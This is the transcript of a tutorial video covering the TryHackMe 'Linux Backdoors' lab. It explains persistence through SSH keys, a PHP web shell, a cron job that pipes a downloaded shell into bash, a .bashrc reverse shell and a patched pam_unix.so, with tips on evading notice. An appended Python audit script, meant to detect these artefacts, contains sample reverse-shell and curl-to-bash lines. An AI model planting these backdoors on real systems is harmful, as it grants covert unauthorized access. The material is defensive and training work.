TryHackMe Linux Backdoors Official Walkthrough

Captions
Hey everyone, welcome back to another video here on DarkSec. I am Dark, and today we're going to be taking a look at the room Linux Backdoors on TryHackMe: learn all the different techniques used to backdoor a Linux machine. This is going to be how we establish persistence and make sure that we can still get back in after we have compromised a machine. Now, why would you want to learn how to do this? This is mostly going to be for red team operations, when you're doing longer engagements and you want to make sure that you can't be kicked out easily. Losing access to a machine that you've already rooted is very annoying. This is something that, even more so for cyber defense tournaments, is going to be something that you're going to want to know. I do recommend becoming familiar with command and control frameworks as well as the Linux backdoors, but it's good having a mix of that, just because if you're kicked out with one method you still have the other one usually to fall back on. That being said, let's go ahead and dive into Task 1, Introduction.

Hey everyone, this room is dedicated for learning common Linux backdoor techniques. A backdoor is simply something we can do to ensure our consistent access to the machine, so even if the machine is rebooted, shut down or whatever, we'd still be able to have access to it. Keep in mind this is when the machine is back on and connected to the internet, or connected to whatever network we're on, if we're on the same network with it. These aren't actual vulnerabilities but just ways to maintain access on a target. To recreate any or all backdoor techniques shown in this room you could simply try them all on your own machine or use the THM AttackBox, as it's safer and it doesn't matter if you screw anything up. I'm going to go and start the AttackBox now just in case we want to replicate any of those. I'll mark that as complete; I get my nice streak there. Let's move into Task 2, taking a look at SSH backdoors.

The first backdoor we are going to look at is the SSH backdoor. The SSH backdoor essentially consists of leaving our SSH keys in some user's home directory. Usually the user would be root, as it's the user with the highest privileges; however, if you want to be tricky you can put them in a non-root user with sudo powers. It's one of those things where, keep in mind, root is going to be under the highest amount of scrutiny, so it's a little bit of creativity there to maintain access in this way. So let's generate a set of SSH keys with ssh-keygen. To do so simply run the command ssh-keygen as shown below, and we'll do that on the attack machine here in a moment once it is up. Running this is going to run this little sequence right here. We can enter in a passphrase if we want to have the RSA keys protected with a password. You can see the random fingerprint here and then the randomart, just showing that the keys that were generated are truly random; with this little bit there, when you run this two times in a row this will be different, and that's the main purpose of it. Now that we have two keys, one private key and one public key, we can now go to /root/.ssh and leave our public key there. Don't forget to rename the public key to authorized_keys, and we'll take a look at that in just a moment. This is just a simple text file, it's not anything very complicated, and this can trip people up just because a lot of times it's assumed that this is something more complex than just a text file. If the directory .ssh is not present you can always create it using the command mkdir .ssh. This does need to be in the home directory, or in the home directory of whatever user you're going to backdoor in this way. A lot of times this will exist, especially within the development environment; if you're working in an actively developed server range, that's something where most devs are probably going to be using private key authentication to get in. Now that we have left our backdoor we can simply log in as root.

Before doing so, give the private key the right permissions using chmod 600 id_rsa. What we're going to go ahead and do is we'll take a look at the .ssh directory; I'll show you where that is just so that you're familiar with that, and we'll run the ssh-keygen command, rather, to show that generation process. Let's go ahead and keep reading, and once this is ready to cooperate we'll go into that. So we're going to set the permissions. This is really important: if you do not have the correct permissions on this, the Linux file system will say hey, this has too permissive permissions, typically; it needs to be locked down a little bit more. This is recognizing that this is a sensitive file, that we need to treat it as being a sensitive file. Let's go ahead, we'll continue this in a moment. We can take a look at the home directory and we do ls, so we can see that we are in the /root home directory. If we do ls -la to show hidden directories we can see that we do, sure enough, have a .ssh directory. If we go to cd .ssh we are now in that hidden directory, and if we run ls we can see that we do have authorized_keys in here, and if we do less on authorized_keys we can see it's just a simple text file. So you have the actual key right here; this is the public key in this specific case. We use the private key when we are going to authenticate; the private key is the one that we keep to ourselves and don't leave in the public space in this way. So, pretty straightforward. If you don't have the authorized_keys file existing yet you can either cat the information into it and make the file, or you just rename your key to this. A lot of people will just rename it because it's, well, easier. With regards to the permissions, this is necessary because if we don't do it SSH will complain about permissions not being secure enough on the key and will most likely not let us use it. Yep, it will complain a lot. After giving the key the right permissions we can do ssh -i, so identity key, your id_rsa rather, and then we're specifying the location of this. This is assuming that it's in the same directory that we are running ssh from; typically this won't be the case here, you'll want to put either a relative or absolute path there, and then root (or whatever user) @ IP address here, to log into our desired machine. One thing to note about this backdoor: this backdoor really isn't hidden at all. Anyone with the right permissions, so anyone that can actually log in as root, would be able to remove our SSH public key or the file authorized_keys entirely. In what directory do we place our keys? That's going to be .ssh. What flag in SSH do we use to show our private key, or rather use it? That's going to be -i. Let's go ahead and we'll cd .. to get out of the .ssh directory, and we're going to jump into Task 3, PHP backdoors.

Let's now get into the second backdoor, PHP backdoors. If you get root access on a Linux host you will most likely search for creds or any useful information in the web root. This is if a website is running on the Linux host; it's very common that if you compromise a website it's probably going to be Linux. The web root directory is usually located in /var/www/html. What you have to know is that whatever you leave in /var/www/html will be available for everyone to use in their browser. Now that you know that, you can try creating a PHP file with any name and try putting this piece of code inside of it. So you can see that this is just a PHP code block that is looking in the request for a parameter called command, and whatever that command is, it's passing it to shell_exec here from the request. So think of this as just running the command itself. This gives us a backdoor with potentially a secret file name that we can just use to execute arbitrary commands. This code simply takes the parameter cmd and will execute anything that is being given to that parameter. Notice that we are using $_REQUEST['cmd'], which means that you can pass the parameter either in a GET or in POST request data, which is kind of interesting. Now that the file is saved and ready we can try to query it. If you left the file in /var/www/html/shell.php (this is super obvious, so be aware of that) you should be able to access it directly, so you can just go to that website. As long as the web server is on and it's running PHP you should be able to access this. Again, a very obvious name; this is something I wouldn't recommend naming it. Ideally in this case, if you want to actually backdoor a machine, again for the sake of maybe a competition or if you're maintaining persistence within a penetration test, you're going to want to name this maybe something more benign, for example welcome.php or gettingstarted.php, something that people don't want to exist, or maybe administration.php or administration_backup.php. Keep that in mind; one of the things there is you want to make sure that it's not obvious. If you left the shell somewhere else, look in what directory it is and try accessing it by doing something like that, so you can just navigate to the subdirectory. Typically the further down you can hide this the better. But generally speaking, so one thing to keep an eye out for, a lot of production servers update via scripts, which is really handy if you are a developer. Now that's great and all, because a lot of times it will just nuke what's in the web directory; everything there is just going to be gone or overwritten. So you kind of have to play around with that: if you are fighting against something that is being continuously updated you might lose your shell, so this is something that can be a little bit tricky. And again, with it being in the web directory and part of the website, anyone can see it, so you might not be the one using your backdoor. Keep that in mind. Try adding this piece of code in already existing PHP files in /var/www/html; adding it a little bit more towards the middle of files will make our malicious actions a little more secret. This is something that, keep in mind, organizations will be running checksums in this case, so this will not work; this is more of a cyber defense thing, or against inexperienced defenders. In this specific case, if you're doing a normal pen test this is not acceptable. This is stuff that, if you are just going to find vulnerabilities and you don't necessarily care about being, you should not necessarily be focusing on persistence. So just keep that in mind. Change the cmd parameter to something else, anything actually. You don't really want to have cmd here; this is a massive red flag. Anyone that's done any boxes, especially people that are more seasoned in industry, is going to know what this is and they're going to be looking for it. You understand what a PHP backdoor is? Yep, we do. So we're going to go ahead and mark that as complete and move on to Task 4, cron job backdoors.

This is one of the more interesting backdoor techniques. Let's now get into the third backdoor technique. This backdoor consists of creating a cron job; think of this as a scheduled task if you're coming from Windows land. If you take a look at your cron jobs file, which is, and we'll take a look at that, /etc/cron job, you would see something like this. And it looks like we don't have that; or crontab rather, that seemed wrong to me. That's a crontab, there we go. So we can see that we have just some basic things here; these are ones that just come built in with Kali, so keep that in mind, but this is the basic structure of a crontab. We don't need to look at this too, too much; know that we can schedule tasks with this. A lot of times you just want to copy one that's already there. This represents all the tasks that are scheduled to run at some time on your machine. Once you have root access on any host you can add any scheduled tasks; you could even just configure a task where every minute a reverse shell is sent to you, which is exactly what we're going to do. Notice the two letters on top of the task, m and h. So we have m right here and then h right here; m is meant to line up with this column and then h is meant to line up with this column. Then we have day of month, month, and I believe this is day of the week as well. So you have a lot of configuration, and you can see what user it's running as and what the actual command is. Very straightforward, very simple, but very effective, especially within the normal management environment. Those are the letters that indicate if the task should be run every hour or every minute, and we'll get into a little bit of how this breaks down in just a second. In the example above you can see that there is an asterisk or a star symbol under the h; that means the following task would run every hour. So you can see that right here: this runs every hour, every hour at 17 minutes in. Now let's get to our backdoor: add this line into our cron job file. This is, actually, I believe that might be every 17 minutes, I'm not sure; that's one of those things that, again, typically what you're doing with this is just replicating one of the tasks already in here. Keep in mind this is also very, very obvious for anyone that's doing forensics on this, so you're typically going to want to avoid this where possible. There are better methods to do this, and again this is really where the value of having that C2 is going to be at, because you can live in memory, and that's really where you want to be ultimately. So, adding our backdoor, we can see that we are having this run on every minute of every hour of every day of the month; we are curling, and so we're sending this backdoor to our shell. Notice that we put a star symbol for everything; this means that our task will run every minute, every hour, every day, etc. We first use curl to download a file and then we pipe it to bash, so we're saying hey, we want to get that file, which is just our shell in this case, and then we're sending it to bash to actually execute it. The contents of the shell file that we are using are simply: this starts out with a shebang, #!/bin/bash, saying that it needs to be run with bash, and then this is just sending a bash shell to the IP and then the port that we specify. Pretty straightforward. We would have to run an HTTP server serving our shell in this specific case; you can achieve this by running python3 -m http.server 8080. This is something to commit to memory; if you don't already have it memorized I would put this in your notes. Once our shell gets downloaded it will be executed by bash and we would get a shell. Don't forget to listen on your specified port with netcat, nc -nvlp and then the port, so setting up your listener here. Please note that this backdoor isn't really hidden, because everyone can see crontabs by just looking in the crontab file. What does the letter m mean in crontabs? That's going to be month, or let's see, months, there we go, maybe; oh, it might be minute, there we go, I'm thinking the wrong thing, month is m-o-n, there we go. And then h is going to be hour, and there we go. Again, this is something to just be aware of: this is very, very obvious. If you can, this is one of those things to have as a backup and potentially just chuck on there for fun; there are better ways of doing this. This is one to be aware of, though. This is a little bit more interesting when you consider it within the privilege escalation vector; you're typically going to be looking at the scheduled tasks more so from looking at something that you can exploit for performing privesc. Putting it in as a backdoor is far less common, but again still something to consider. We'll go and mark that as complete and then move into Task 5, .bashrc backdoors, something a lot more interesting.

Let's now get into the .bashrc backdoor. If a user has bash as their login shell, the .bashrc file in their home directory is executed when an interactive session is launched. So if you know any users that log on to their system quite often (targeting devs in this case can be very effective), you could simply run this command to include your reverse shell into their .bashrc. This is something that not as many people know about, and it is very, very useful. This is one that, especially within that cyber defense competition range, is simple, it's effective, and you're probably not going to get caught. So you can see a very straightforward one-liner here; again, make sure you change that IP and port with your IP and port. But this is a great way to have a secondary backdoor: you can shell every single user on the system that has a .bashrc, so you make sure that you're getting shells every single time this happens. Just make sure that you have a netcat listener ready so that you can receive that shell, and we have a note right here to make sure that you are ready to actually catch that. This attack is very sneaky, as no one really thinks about ever checking their .bashrc file. This is one that, if you are a defense team for cyber defense competitions, make sure you check this when you are getting your machine; this is probably already infected. On the other hand, you can't exactly know if there are any users that will actually log into their system, so you might wait a really long period of time. This is where putting this in every single user's .bashrc can really pay off. You understand the .bashrc backdoor technique? So we're going to mark that as complete and we're going to move into the final task, pam_unix.so backdoors.

Let's get into the fifth and last backdoor of this room. There are many, many more backdoors available other than the five shown in this room; this is just a really nice starter set, especially as you are starting to compromise boxes and get a little bit familiar with offensive security. You can start practicing these and they're a lot of fun. This is one of those things that, as you complete CTFs, so maybe the Mr. Robot room, go back, do this, try setting up some backdoors and play around with it. A good resource that I found really helpful, so the room creator when creating this room, is this link; it looks like that is a "nine ways to backdoor a Linux box" article, probably worth checking out, so feel free to take a look through there. Okay, so now on to the fifth backdoor. Again, commentary on this, I've said it a couple of times in this room: be sure to check out, more specifically, the C2 frameworks, because a lot of them have automatic backdoors that are built in, and those are a lot of times more flexible and they're going to tie automatically into your C2 framework, which is going to give you a lot more power. The vector that we are going to look at is the pam_unix.so backdoor. If you don't know what the file pam_unix.so is, well, it is simply one of the many files in Linux that is responsible for authentication. PAM stands for, in this case, Pluggable Authentication Modules, I believe. SSH ties into this; this is something that if you ever have to get Kerberos working with a Linux box (hopefully it's not on FreeBSD, I've had a lot of trouble trying to get Kerberos tied into that), it's one of these things where you'll become very, very familiar with PAM very quickly. So let's actually get into the backdoor. We can see that we have this little snippet of code, as seen here: the file pam_unix.so uses the unix_verify_password function to verify the user-supplied password, and we can see that we have that right here. Now let's look at this screenshot. Don't worry too much if this is going a little bit over your head; just know that we have this method that we are targeting in particular. So taking a look at this screenshot we can see that we have added a new line of code, or a new line to our code: if strcmp, p (so the password) equals 0x and then the string, we are going to make sure that we are returning this as successful. So we are adding essentially a verification here; we're actually going to walk through it here. We're adding an extra step to this verification, which we can just have our own backdoor password in. So first we'll have to know what the function strcmp does. This function basically compares two strings. In the screenshot above we compare the variable p and the string 0x... (I'm not going to butcher that). The variable p stands for the user-supplied password, in other words the password that the user supplied; it's just going to be what's entered in, typically, especially if they're using a standard login. You can also see the "not equal to zero" at the end of the statement; this means if not successful, so if the variable p (the user-supplied password) and the string are not the same, the unix... so it will pass it to the actual verification method here. So we have another way that we can actually, we're adding a step beforehand, before the actual authentication method: so if the password matches this we can log in automatically; if not, we're going to go to the standard authentication there. On the other hand, if the variable and the string are the same, the authentication is a success; we will mark the success by using PAM_SUCCESS, which we can see right here. So this backdoor essentially consists of adding your own password to the pam_unix.so. Since you know the password that you added into the file, you will always be able to authenticate with that password until it's removed from that specific file. So let's do a little recap. Say a user types the password password123 and tries to authenticate. We will compare his password to the string that we've inserted into this; if the strings match, authentication is successful. So we've added that in, that we can just authenticate as any user. But those two strings, if they don't match, the authentication will just be passed to the standard unix_verify_password function, and then it just does normal authentication; this is just comparing it to the user's password from /etc/shadow and making sure that they're the same and allowing that user to log in. This is how the intended authentication should work. However, this technique is called a backdoor as you add your own password that you can always use to log in as anybody, and it takes out of the pam_unix.so, so we're adding our own password that we can authenticate as any user. This backdoor is really hard to spot, as once again nobody really thinks about looking into such files. This is a really good one; this is one that I definitely would say would not get caught immediately, this is definitely a lot lesser known, and this is one that I definitely would recommend having in your arsenal. Since this method is slowly becoming more and more popular you probably won't be able to use it every time, as everyone would, slowly but surely, understand how to protect themselves. So you can see some resources there. We can go and mark this as complete, since we understand the art of Linux backdoors, and we'll mark this as complete to go ahead and finish the room. So moving forward I would definitely recommend taking these and applying them to a Linux box that you've already gone through; run through it again, it could just be a simple one, practice these backdoors, start getting them into muscle memory so that you are familiar with them. They're very useful for engagements, and especially this one and, let's see, the .bashrc backdoor, those are really going to be the ones that are going to be very, very, very valuable tools in your arsenal. Otherwise, that's going to do it for this video. If you have any questions I've left links to the TryHackMe Discord as well as the DarkSec Discord in the description below. Otherwise, until next time, happy hacking.
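Each of the five techniques walked through above leaves a file-level artefact: an extra authorized_keys entry, a crontab line that curls a file into bash, a reverse-shell line in .bashrc, a PHP file that hands a request parameter to shell_exec, and a modified pam_unix.so. The Python audit below is an added example, not code from the video or from the TryHackMe room, written from the defender's side: it runs the corresponding checks over constructed sample inputs and reports findings. The paths, the allow-listed key blob, the placeholder expected hash and every sample line are constructed for the demonstration; on a real host the known-good hash for pam_unix.so would come from the distro package (the package names I assume are libpam-modules on Debian-based systems, checkable with `dpkg -V libpam-modules`, and pam on RHEL-based ones, checkable with `rpm -V pam`).

```python
import hashlib
import re
from dataclasses import dataclass


@dataclass
class Finding:
    check: str      # which persistence technique the hit relates to
    location: str   # file (and line) where it was found
    detail: str     # what matched


# Indicators taken from the techniques the walkthrough describes.
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|bash\s+-i\s*>&")
PHP_WEBSHELL = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen)\s*\(\s*\$_(REQUEST|GET|POST)\b")


def sha256_hex(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def describe_schedule(fields):
    """Turn the five crontab time fields (m h dom mon dow) into words."""
    m, h, dom, mon, dow = fields
    if all(f == "*" for f in fields):
        return "every minute"
    if (h, dom, mon, dow) == ("*", "*", "*", "*"):
        return f"at minute {m} of every hour"
    return "m h dom mon dow = " + " ".join(fields)


def audit_authorized_keys(text, allowed_blobs, path):
    """Flag any authorized_keys entry whose key blob is not on the allow-list."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # The key type may be preceded by options (e.g. from=...); the blob follows it.
        i = next((k for k, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-"))), None)
        blob = fields[i + 1] if i is not None and i + 1 < len(fields) else None
        if blob not in allowed_blobs:
            comment = fields[-1] if i is not None and len(fields) > i + 2 else ""
            out.append(Finding("ssh-key", f"{path}:{n}", f"unknown key, comment={comment!r}"))
    return out


def audit_crontab(text, path):
    """Flag /etc/crontab entries (m h dom mon dow user command) that pipe a download into a shell."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:      # blank lines and variable assignments such as PATH=
            continue
        schedule, user, command = fields[:5], fields[5], fields[6]
        if DOWNLOAD_TO_SHELL.search(command):
            out.append(Finding("cron", f"{path}:{n}",
                               f"user={user} runs {describe_schedule(schedule)}: {command}"))
    return out


def audit_shell_rc(text, path):
    """Flag .bashrc lines that open a network connection from the shell."""
    return [Finding("bashrc", f"{path}:{n}", line.strip())
            for n, line in enumerate(text.splitlines(), 1)
            if REVERSE_SHELL.search(line) and not line.lstrip().startswith("#")]


def audit_php(text, path):
    """Flag PHP that hands a request parameter straight to a command-execution function."""
    return [Finding("php-webshell", f"{path}:{n}", line.strip())
            for n, line in enumerate(text.splitlines(), 1)
            if PHP_WEBSHELL.search(line)]


def audit_pam_module(content, expected_sha256, path):
    """Compare the on-disk pam_unix.so against a known-good hash from the distro package."""
    actual = sha256_hex(content)
    if actual != expected_sha256:
        return [Finding("pam", path, f"sha256 {actual[:16]}... does not match known-good value")]
    return []


def run_audit():
    """Run every check over constructed sample inputs and return the findings in order."""
    # Constructed samples: one benign and one suspicious entry per artefact.
    authorized_keys = "ssh-ed25519 AAAAKNOWNBLOB alice@laptop\nssh-rsa AAAAUNKNOWNBLOB kali\n"
    crontab = ("17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly\n"
               "* * * * * root curl http://10.0.0.1:8080/shell | bash\n")
    bashrc = "alias ll='ls -la'\nbash -i >& /dev/tcp/10.0.0.1/4444 0>&1\n"
    php = "<?php echo 'hello'; ?>\n<?php shell_exec($_REQUEST['cmd']); ?>\n"
    pam_bytes = b"constructed stand-in for the module bytes"
    findings = []
    findings += audit_authorized_keys(authorized_keys, {"AAAAKNOWNBLOB"}, "/root/.ssh/authorized_keys")
    findings += audit_crontab(crontab, "/etc/crontab")
    findings += audit_shell_rc(bashrc, "/home/dev/.bashrc")
    findings += audit_php(php, "/var/www/html/welcome.php")
    # "0" * 64 is a placeholder for the hash published with the distro package.
    findings += audit_pam_module(pam_bytes, "0" * 64, "/lib/security/pam_unix.so")
    return findings


if __name__ == "__main__":
    for f in run_audit():
        print(f"[{f.check}] {f.location}: {f.detail}")
```

The regexes are deliberately narrow, so they match what the walkthrough shows rather than every possible variant; the point of the script is that each technique has a concrete place to look, and that the crontab's five time fields (minute first, hour second) read as "every minute" only when all five are stars.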
Info
Channel: DarkSec
Views: 8,314
Keywords: infosec, tryhackme, box, hacking, learn, darkstar, darksec, educational, darkstar7471, try, hack, me
Id: -xHk7N3vF-A
Length: 24min 9sec (1449 seconds)
Published: Fri Apr 23 2021